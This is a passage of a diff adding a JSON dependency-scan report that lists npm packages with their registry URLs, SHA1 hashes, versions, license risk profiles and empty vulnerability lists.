"95b88685-32a4-40b1-b9be-d2bf748d8463", + "keyId": 27043741, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/url-join/-/url-join-1.1.0.tgz", + "homePage": "https://github.com/jfromaniello/url-join#readme", + "genericPackageIndex": "https://www.npmjs.org/package/url-join" + }, + "matchType": "SHA1", + "sha1": "741c6c2f4596c4830d6718460920d0c92202dc78", + "name": "url-join-1.1.0.tgz", + "artifactId": "url-join-1.1.0.tgz", + "version": "1.1.0", + "groupId": "url-join", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/url-join" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "a5e24d26-d220-4093-a7c2-cb6b1a65d66b", + "keyId": 26955822, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/cli-cursor/-/cli-cursor-2.1.0.tgz", + "homePage": "https://github.com/sindresorhus/cli-cursor#readme", + "genericPackageIndex": "https://www.npmjs.org/package/cli-cursor" + }, + "matchType": "SHA1", + "sha1": "b35dac376479facc3e94747d41d0d0f5238ffcb5", + "name": "cli-cursor-2.1.0.tgz", + "artifactId": "cli-cursor-2.1.0.tgz", + "version": "2.1.0", + "groupId": "cli-cursor", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/0d9dc416-f116-452e-b02c-d7cf1be4663e" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "44547aaf-59c9-49da-9636-c21d3fba67a8", + "keyId": 26955341, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/globby/-/globby-6.1.0.tgz", + "homePage": "https://github.com/sindresorhus/globby#readme", + "genericPackageIndex": "https://www.npmjs.org/package/globby" + }, + "matchType": "SHA1", + "sha1": "f5a6d70e8395e21c858fb0489d64df02424d506c", + "name": "globby-6.1.0.tgz", + "artifactId": "globby-6.1.0.tgz", + "version": "6.1.0", + "groupId": "globby", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/14db4063-fe35-4feb-aac1-8ff1607dadee" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "ba7accde-cd86-4d17-ad5a-96f10e2f2953", + "keyId": 26966801, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/import-from/-/import-from-2.1.0.tgz", + "homePage": "https://github.com/sindresorhus/import-from#readme", + "genericPackageIndex": "https://www.npmjs.org/package/import-from" + }, + "matchType": "SHA1", + "sha1": "335db7f2a7affd53aaa471d4b8021dee36b7f3b1", + "name": "import-from-2.1.0.tgz", + "artifactId": "import-from-2.1.0.tgz", + "version": "2.1.0", + "groupId": "import-from", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/e4543c47-e5e7-484c-9d20-f1fd5f3bb266" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "5665f512-cfa9-4a6f-9c54-abc0c0563399", + "keyId": 26958411, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/statuses/-/statuses-1.5.0.tgz", + "homePage": "https://github.com/jshttp/statuses#readme", + "genericPackageIndex": "https://www.npmjs.org/package/statuses" + }, + "matchType": "SHA1", + "sha1": "161c7dac177659fd9811f43771fa99381478628c", + "name": "statuses-1.5.0.tgz", + "artifactId": "statuses-1.5.0.tgz", + "version": "1.5.0", + "groupId": "statuses", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/statuses/v/1.5.0" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "6d5b1ea2-be87-4313-b211-947f9e6b1c86", + "keyId": 26955698, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/p-locate/-/p-locate-2.0.0.tgz", + "homePage": "https://github.com/sindresorhus/p-locate#readme", + "genericPackageIndex": "https://www.npmjs.org/package/p-locate" + }, + "matchType": "SHA1", + "sha1": "20a0103b222a70c8fd39cc2e580680f3dde5ec43", + "name": "p-locate-2.0.0.tgz", + "artifactId": "p-locate-2.0.0.tgz", + "version": "2.0.0", + "groupId": "p-locate", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/1e19823d-ce1f-4a66-953e-2d22bf56a128" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "ef684d5a-28da-4cc0-9f29-05348eae506f", + "keyId": 27607440, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/parse5-htmlparser2-tree-adapter/-/parse5-htmlparser2-tree-adapter-5.1.0.tgz", + "homePage": "https://github.com/inikulin/parse5", + "genericPackageIndex": "https://www.npmjs.org/package/parse5-htmlparser2-tree-adapter" + }, + "matchType": "SHA1", + "sha1": "a8244ee12bbd6b8937ad2a16ea43fe348aebcc86", + "name": "parse5-htmlparser2-tree-adapter-5.1.0.tgz", + "artifactId": "parse5-htmlparser2-tree-adapter-5.1.0.tgz", + "version": "5.1.0", + "groupId": "parse5-htmlparser2-tree-adapter", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/1aaeb59f-82f6-4012-984b-0c40dab45990" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "3d057fd3-0a4e-47bb-a633-8eeefcc2402b", + "keyId": 26954618, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/meow/-/meow-3.7.0.tgz", + "homePage": "https://github.com/sindresorhus/meow#readme", + "genericPackageIndex": "https://www.npmjs.org/package/meow" + }, + "matchType": "SHA1", + "sha1": "72cb668b425228290abbfa856892587308a801fb", + "name": "meow-3.7.0.tgz", + "artifactId": "meow-3.7.0.tgz", + "version": "3.7.0", + "groupId": "meow", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/meow/v/3.7.0" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "24e7a416-d271-4e7c-8a83-70e51127f49a", + "keyId": 26954805, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/p-try/-/p-try-1.0.0.tgz", + "homePage": "https://github.com/sindresorhus/p-try#readme", + "genericPackageIndex": "https://www.npmjs.org/package/p-try" + }, + "matchType": "SHA1", + "sha1": "cbc79cdbaf8fd4228e13f621f2b1a237c1b207b3", + "name": "p-try-1.0.0.tgz", + "artifactId": "p-try-1.0.0.tgz", + "version": "1.0.0", + "groupId": "p-try", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/p-try" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "89ecc9fa-ec49-4dd6-9223-59b2ed2dbc1f", + "keyId": 26955828, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/repeating/-/repeating-2.0.1.tgz", + "homePage": "https://github.com/sindresorhus/repeating#readme", + "genericPackageIndex": "https://www.npmjs.org/package/repeating" + }, + "matchType": "SHA1", + "sha1": "5214c53a926d3552707527fbab415dbc08d06dda", + "name": "repeating-2.0.1.tgz", + "artifactId": "repeating-2.0.1.tgz", + "version": "2.0.1", + "groupId": "repeating", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/repeating/v/2.0.1" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "ecade1ed-16dd-4e8b-870f-489de60747b8", + "keyId": 26954848, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/regenerator-runtime/-/regenerator-runtime-0.11.1.tgz", + "genericPackageIndex": "https://www.npmjs.org/package/regenerator-runtime" + }, + "matchType": "SHA1", + "sha1": "be05ad7f9bf7d22e056f9726cee5017fbf19e2e9", + "name": "regenerator-runtime-0.11.1.tgz", + "artifactId": "regenerator-runtime-0.11.1.tgz", + "version": "0.11.1", + "groupId": "regenerator-runtime", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/2578b742-13a4-4e15-9a9c-80d15988cd45" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "2fcb67fc-c0cf-446b-8188-5805c3ae0df1", + "keyId": 27030071, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/classnames/-/classnames-2.2.6.tgz", + "homePage": "https://github.com/JedWatson/classnames#readme", + "genericPackageIndex": "https://www.npmjs.org/package/classnames" + }, + "matchType": "SHA1", + "sha1": "43935bffdd291f326dad0a205309b38d00f650ce", + "name": "classnames-2.2.6.tgz", + "artifactId": "classnames-2.2.6.tgz", + "version": "2.2.6", + "groupId": "classnames", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/classnames" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "663ed9bb-79bb-4c0b-ad25-625d3b2bad2c", + "keyId": 26949213, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/decamelize/-/decamelize-1.2.0.tgz", + "homePage": "https://github.com/sindresorhus/decamelize#readme", + "genericPackageIndex": "https://www.npmjs.org/package/decamelize" + }, + "matchType": "SHA1", + "sha1": "f6534d15148269b20352e7bee26f501f9a191290", + "name": "decamelize-1.2.0.tgz", + "artifactId": "decamelize-1.2.0.tgz", + "version": "1.2.0", + "groupId": "decamelize", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/d72c89f7-2fba-4716-acff-6eea1f9598b5" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "938b604f-aa08-42e9-a6b3-ae8350f658af", + "keyId": 27387730, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/http-errors/-/http-errors-1.7.2.tgz", + "homePage": "https://github.com/jshttp/http-errors#readme", + "genericPackageIndex": "https://www.npmjs.org/package/http-errors" + }, + "matchType": "SHA1", + "sha1": "4f5029cf13239f31036e5b2e55292bcfbcc85c8f", + "name": "http-errors-1.7.2.tgz", + "artifactId": "http-errors-1.7.2.tgz", + "version": "1.7.2", + "groupId": "http-errors", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/bdf85010-0eb8-428e-a6eb-7d99d04d60a8" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "0d357960-3cfe-4e79-86fa-90789f5dc454", + "keyId": 26955072, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/private/-/private-0.1.8.tgz", + "homePage": "http://github.com/benjamn/private", + "genericPackageIndex": "https://www.npmjs.org/package/private" + }, + "matchType": "SHA1", + "sha1": "2381edb3689f7a53d653190060fcf822d2f368ff", + "name": "private-0.1.8.tgz", + "artifactId": "private-0.1.8.tgz", + "version": "0.1.8", + "groupId": "private", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/d6333535-b57e-4089-b952-f5cbdaa66fa9" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "bfd52c31-44cc-4b0e-a3a0-3099d4d290af", + "keyId": 26954975, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/etag/-/etag-1.8.1.tgz", + "homePage": "https://github.com/jshttp/etag#readme", + "genericPackageIndex": "https://www.npmjs.org/package/etag" + }, + "matchType": "SHA1", + "sha1": "41ae2eeb65efa62268aebfea83ac7d79299b0887", + "name": "etag-1.8.1.tgz", + "artifactId": "etag-1.8.1.tgz", + "version": "1.8.1", + "groupId": "etag", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/etag/v/1.8.1" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "b82b2827-78d4-4dc1-8e30-6217328220c4", + "keyId": 26955601, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/punycode/-/punycode-2.1.1.tgz", + "homePage": "https://mths.be/punycode", + "genericPackageIndex": "https://www.npmjs.org/package/punycode" + }, + "matchType": "SHA1", + "sha1": "b58b010ac40c22c5657616c8d2c2c02c7bf479ec", + "name": "punycode-2.1.1.tgz", + "artifactId": "punycode-2.1.1.tgz", + "version": "2.1.1", + "groupId": "punycode", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/fe988861-c03d-4431-8422-4d5cdf10443b" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "11f503f7-494f-451e-a056-9d3457f067b8", + "keyId": 26955747, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/path-is-inside/-/path-is-inside-1.0.2.tgz", + "homePage": "https://github.com/domenic/path-is-inside#readme", + "genericPackageIndex": "https://www.npmjs.org/package/path-is-inside" + }, + "matchType": "SHA1", + "sha1": "365417dede44430d1c11af61027facf074bdfc53", + "name": "path-is-inside-1.0.2.tgz", + "artifactId": "path-is-inside-1.0.2.tgz", + "version": "1.0.2", + "groupId": "path-is-inside", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/path-is-inside/v/1.0.2" + }, + { + "name": "WTFPL", + "url": "http://sam.zoy.org/wtfpl/COPYING", + "profileInfo": {}, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/8d511847-359c-4611-b352-a4ecbe7a134e" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "2923da34-a392-41e1-bfc5-c5227b83137a", + "keyId": 26948650, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/strip-json-comments/-/strip-json-comments-2.0.1.tgz", + "homePage": "https://github.com/sindresorhus/strip-json-comments#readme", + "genericPackageIndex": "https://www.npmjs.org/package/strip-json-comments" + }, + "matchType": "SHA1", + "sha1": "3c531942e908c2697c0ec344858c286c7ca0a60a", + "name": "strip-json-comments-2.0.1.tgz", + "artifactId": "strip-json-comments-2.0.1.tgz", + "version": "2.0.1", + "groupId": "strip-json-comments", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/strip-json-comments" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "5a9c2de1-b538-4b56-a521-b70f3f9ebfdd", + "keyId": 26966864, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/ansi-html/-/ansi-html-0.0.7.tgz", + "homePage": "https://github.com/Tjatse/ansi-html", + "genericPackageIndex": "https://www.npmjs.org/package/ansi-html" + }, + "matchType": "SHA1", + "sha1": "813584021962a9e9e6fd039f940d12f56ca7859e", + "name": "ansi-html-0.0.7.tgz", + "artifactId": "ansi-html-0.0.7.tgz", + "version": "0.0.7", + "groupId": "ansi-html", + "licenses": [ + { + "name": "Apache 2.0", + "url": "http://apache.org/licenses/LICENSE-2.0", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "linking": "DYNAMIC", + "royaltyFree": "CONDITIONAL" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/ansi-html/v/0.0.7" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "0b1d4728-1bc5-4c55-b787-44fbe1ecfa4a", + "keyId": 27033002, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/ignore-loader/-/ignore-loader-0.1.2.tgz", + "homePage": "https://github.com/cherrry/ignore-loader#readme", + "genericPackageIndex": "https://www.npmjs.org/package/ignore-loader" + }, + "matchType": "SHA1", + "sha1": "d81f240376d0ba4f0d778972c3ad25874117a463", + "name": "ignore-loader-0.1.2.tgz", + "artifactId": "ignore-loader-0.1.2.tgz", + "version": "0.1.2", + "groupId": "ignore-loader", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/79f320f8-fdc9-4a75-8b11-74cfc4b1df7c" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "e465bc33-66d6-4a75-844c-e3ee13ebfbc3", + "keyId": 26948736, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/core-util-is/-/core-util-is-1.0.2.tgz", + "homePage": "https://github.com/isaacs/core-util-is#readme", + "genericPackageIndex": "https://www.npmjs.org/package/core-util-is" + }, + "matchType": "SHA1", + "sha1": "b5fd54220aa2bc5ab57aab7140c940754503c1a7", + "name": "core-util-is-1.0.2.tgz", + "artifactId": "core-util-is-1.0.2.tgz", + "version": "1.0.2", + "groupId": "core-util-is", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/9ddcb913-adf7-4075-9776-74ae51bb7372" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "6ffc8e2c-724e-427e-a6a5-eb1e4bd44405", + "keyId": 26955174, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/import-lazy/-/import-lazy-2.1.0.tgz", + "homePage": "https://github.com/sindresorhus/import-lazy#readme", + "genericPackageIndex": "https://www.npmjs.org/package/import-lazy" + }, + "matchType": "SHA1", + "sha1": "05698e3d45c88e8d7e9d92cb0584e77f096f3e43", + "name": "import-lazy-2.1.0.tgz", + "artifactId": "import-lazy-2.1.0.tgz", + "version": "2.1.0", + "groupId": "import-lazy", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/import-lazy/v/2.1.0" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "b6ddfe1b-8095-4c0b-9179-fe706043689e", + "keyId": 26955130, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/utils-merge/-/utils-merge-1.0.1.tgz", + "homePage": "https://github.com/jaredhanson/utils-merge#readme", + "genericPackageIndex": "https://www.npmjs.org/package/utils-merge" + }, + "matchType": "SHA1", + "sha1": "9f95710f50a267947b2ccc124741c1028427e713", + "name": "utils-merge-1.0.1.tgz", + "artifactId": "utils-merge-1.0.1.tgz", + "version": "1.0.1", + "groupId": "utils-merge", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/utils-merge/v/1.0.1" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "f0288616-3ab5-44f4-9b5c-bf5daa1145fd", + "keyId": 26955620, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/restore-cursor/-/restore-cursor-2.0.0.tgz", + "homePage": "https://github.com/sindresorhus/restore-cursor#readme", + "genericPackageIndex": "https://www.npmjs.org/package/restore-cursor" + }, + "matchType": "SHA1", + "sha1": "9f7ee287f82fd326d4fd162923d62129eee0dfaf", + "name": "restore-cursor-2.0.0.tgz", + "artifactId": "restore-cursor-2.0.0.tgz", + "version": "2.0.0", + "groupId": "restore-cursor", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/74753b59-3d1b-4f37-a1a7-7d45a9805fa0" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "ef0aec21-dd8f-41df-af3d-4511b78c7141", + "keyId": 27264555, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/find-cache-dir/-/find-cache-dir-2.1.0.tgz", + "homePage": "https://github.com/avajs/find-cache-dir#readme", + "genericPackageIndex": "https://www.npmjs.org/package/find-cache-dir" + }, + "matchType": "SHA1", + "sha1": "8d0f94cd13fe43c6c7c261a0d86115ca918c05f7", + "name": "find-cache-dir-2.1.0.tgz", + "artifactId": "find-cache-dir-2.1.0.tgz", + "version": "2.1.0", + "groupId": "find-cache-dir", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/95cb52d3-131a-464e-b6fa-e8a3b31b2e29" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "560e3d70-bcc5-4b49-8275-f8da83a55e65", + "keyId": 26955124, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/code-point-at/-/code-point-at-1.1.0.tgz", + "homePage": "https://github.com/sindresorhus/code-point-at#readme", + "genericPackageIndex": "https://www.npmjs.org/package/code-point-at" + }, + "matchType": "SHA1", + "sha1": "0d070b4d043a5bea33a2f1a40e2edb3d9a4ccf77", + "name": "code-point-at-1.1.0.tgz", + "artifactId": "code-point-at-1.1.0.tgz", + "version": "1.1.0", + "groupId": "code-point-at", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/40ed7fcb-2d4b-4248-b0dc-a01bb0f7a0a6" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "5b5e1a09-d7cd-4ed7-9225-5fc403efddee", + "keyId": 26966730, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/source-map/-/source-map-0.7.3.tgz", + "homePage": "https://github.com/mozilla/source-map", + "genericPackageIndex": "https://www.npmjs.org/package/source-map" + }, + "matchType": "SHA1", + "sha1": "5302f8169031735226544092e64981f751750383", + "name": "source-map-0.7.3.tgz", + "artifactId": "source-map-0.7.3.tgz", + "version": "0.7.3", + "groupId": "source-map", + "licenses": [ + { + "name": "BSD 3", + "url": "http://www.opensource.org/licenses/BSD-3-Clause", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "THREE", + "copyleft": "NO", + "linking": "NON_VIRAL", + "royaltyFree": "NO" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/source-map" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "5db5dd11-4722-4470-8f16-de24b3998ae4", + "keyId": 26957370, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/spdx-expression-parse/-/spdx-expression-parse-3.0.0.tgz", + "homePage": "https://github.com/jslicense/spdx-expression-parse.js#readme", + "genericPackageIndex": "https://www.npmjs.org/package/spdx-expression-parse" + }, + "matchType": "SHA1", + "sha1": "99e119b7a5da00e05491c9fa338b7904823b41d0", + "name": "spdx-expression-parse-3.0.0.tgz", + "artifactId": "spdx-expression-parse-3.0.0.tgz", + "version": 